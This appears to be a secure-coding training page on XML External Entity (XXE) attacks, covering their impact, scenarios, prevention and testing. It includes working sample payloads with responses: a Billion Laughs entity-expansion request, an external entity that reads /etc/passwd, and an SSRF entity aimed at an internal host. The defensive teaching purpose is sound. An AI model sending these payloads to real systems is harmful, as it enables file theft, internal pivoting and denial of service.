Link Search Menu Expand Document

XML Entity Expansion

  1. XML Entity Expansion
    1. Description
    2. Impact
    3. Scenarios
      1. Denial of Service Attacks
      2. Server-Side Request Forgery Attacks
    4. Prevention
    5. Testing

Description

XML External Entity Expansion (also referred to as XXE) attacks are used against applications that process XML input by exploiting XML external entity support. By supplying hostile XML input containing a specification of an external entity to a weakly configured XML parser, attackers may be able to view files on the application server filesystem, conduct denial-of-service attacks, and interact with any external or backend systems to which the application has access.

XXE vulnerabilities occur when the widely used XML format (a protocol typically used to transmit data between the browser and the server) contains various potentially dangerous features. Due to the potential severity of XXE attacks and their ongoing prevalence, these attacks make an appearance on the OWASP Top 10 list of web application security risks.

As with many of the vulnerabilities on this list, prevalence would markedly decrease with more comprehensive and continuously updated developer training.

Impact

XXE attacks can include conducting denial-of-service attacks and disclosing local files containing sensitive data such as passwords or private user data. As the attack occurs relative to the application processing the XML document, it can enable attackers to laterally traverse to other internal systems to potentially stage Server-Side Request Forgery (SSRF) attacks against unprotected internal services.

XML attacks have been understood for almost 20 years, and yet even in recent years, powerhouses like Google and Facebook are known to have faced issues with these types of attacks. This serves as a stark reminder that chaos can occur (and take the form of potentially massive fines) simply due to misconfiguration and poorly implemented code.

Scenarios

The main features of XML that are relevant to understanding XXE vulnerabilities are XML entities and Document Type Definition.

XML entities are a way of representing an item of data within an XML document instead of using the data itself. Entities, such as &lt; and &gt; that represent the characters < and > respectively, are already embedded in the XML language. New entities can be defined using Document Type Definition.

Document Type Definition (DTD) defines the structure of an XML document, and it is usually used for validation. It can be embedded at the start of an XML document by using the optional DOCTYPE element. External DTDs can be loaded from a remote URL.

Denial of Service Attacks

XML entities can be abused to cause denial-of-service attacks by embedding entities within entities within entities, causing the memory of the XML parser to overload. The so-called Billion Laughs attack shown below takes advantage of a Document Type Definition called foo, and an element called bar, replaced, in this case, with the name of a fine security training platform! Anytime &bar; is used, the XML parser replaces it with SecureFlag.

Request

POST http://www.vulnerableapp.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY bar "SecureFlag ">
  <!ENTITY t1 "&bar;&bar;">
  <!ENTITY t2 "&t1;&t1;&t1;&t1;">
  <!ENTITY t3 "&t2;&t2;&t2;&t2;&t2;">
]>
<foo>
  Join &t3;
</foo>

Response

HTTP/1.0 200 OK
 
Join SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlagSecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag SecureFlag

Server-Side Request Forgery Attacks

DTDs and XML external entities can also be leveraged to trick an application into retrieving files on the system.

Request

POST http://www.vulnerableapp.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "file:///etc/passwd">
]>
<foo>
  &xxe;
</foo>

Response

HTTP/1.0 200 OK
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh 
(...)

An attacker could perform a Server-Side Request Forgery attack, pointing the URI to an external resource, such as an HTTP location. This, in turn, can be used to pivot and interact with any external or backend systems to which the application has access.

Request

POST http://www.vulnerableapp.com/xml HTTP/1.1

<?xml version="1.0" encoding="ISO-8859-1"?> 
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM
  "http://internal.vulnerableapp.com:8443">
]>
<foo>
  &xxe;
</foo>

Response

HTTP/1.0 200 OK
 
(.. result of the request to http://internal.vulnerableapp.com:8443 ...)

Prevention

Disabling the Document Type Definitions (DTDs) function will effectively prevent most attacks.

When possible, handling data using simpler formats like JSON is recommended. For almost a decade, JSON has been seen as preferable to the use of XML due to its lightweight syntax and newer construction.

Of course, exceptions exist to prove rules, and in cases where it is absolutely not possible to switch off DTDs within the business parameters nor use another format, the following measures must be applied by developers.

When the entire XML document is transmitted from an untrusted client, it’s not usually possible to selectively validate or escape tainted data within the system identifier in the DTD. Therefore, the XML processor should be configured to use a local static DTD and disallow any declared DTD included in the XML document.

Testing

Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features, such as resolving external entities, are disabled to prevent XML External Entity (XXE) attacks.


Table of contents